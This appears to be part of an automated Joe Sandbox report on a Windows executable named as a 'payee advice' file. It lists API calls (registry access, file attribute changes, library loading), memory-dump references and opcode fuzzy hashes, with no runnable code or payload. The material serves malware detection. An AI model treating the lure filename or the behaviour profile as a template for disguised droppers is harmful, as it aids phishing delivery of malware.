                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                          • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                          • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                          • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                          • Opcode ID: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
                                                                                                                                          • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                                                          • Opcode Fuzzy Hash: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
                                                                                                                                          • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                                                          APIs
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                          • String ID: Call
                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                          • Opcode ID: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
                                                                                                                                          • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                                                          • Opcode Fuzzy Hash: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
                                                                                                                                          • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 167947723-0
                                                                                                                                          • Opcode ID: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
                                                                                                                                          • Instruction ID: d1cba53e09d25e0e4976289683f2ac1bdc9fdbf0613ee45d63c2eeb4b4bf5101
                                                                                                                                          • Opcode Fuzzy Hash: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
                                                                                                                                          • Instruction Fuzzy Hash: 8AF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D2B85D41DB2A
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1948546556-0
                                                                                                                                          • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                          • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                                                          • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                          • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                          • Opcode ID: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
                                                                                                                                          • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                                                          • Opcode Fuzzy Hash: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
                                                                                                                                          • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                                          APIs
                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                          • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                          • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                                                          • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                          • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseDeleteOpenValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 849931509-0
                                                                                                                                          • Opcode ID: 816fb59d23b0977f6ef732cd369a029ecaf090c0f9f3f491ff21e0f5ffc01560
                                                                                                                                          • Instruction ID: f65991dd8835b810368ef95f62892a142216c4200c100bb05ab411dbf566f3c1
                                                                                                                                          • Opcode Fuzzy Hash: 816fb59d23b0977f6ef732cd369a029ecaf090c0f9f3f491ff21e0f5ffc01560
                                                                                                                                          • Instruction Fuzzy Hash: D5F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D5FC5D028A6D
                                                                                                                                          APIs
                                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                          • Opcode ID: 9329ecf0762317e958e6b8c98019b4f1cdb7ae87d52addd692e319db29120862
                                                                                                                                          • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                                                          • Opcode Fuzzy Hash: 9329ecf0762317e958e6b8c98019b4f1cdb7ae87d52addd692e319db29120862
                                                                                                                                          • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                                          • Instruction ID: 0892b5ef0b2723f07dcd522954823931705bd605f292322b3a664a2a0928558f
                                                                                                                                          • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                                          • Instruction Fuzzy Hash: CDD0C972908020AFC2103728AE0C89BBB65DB543717018B31F965A22B0C7305C528AA6
                                                                                                                                          APIs
                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Open
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                          • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                          • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                          • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
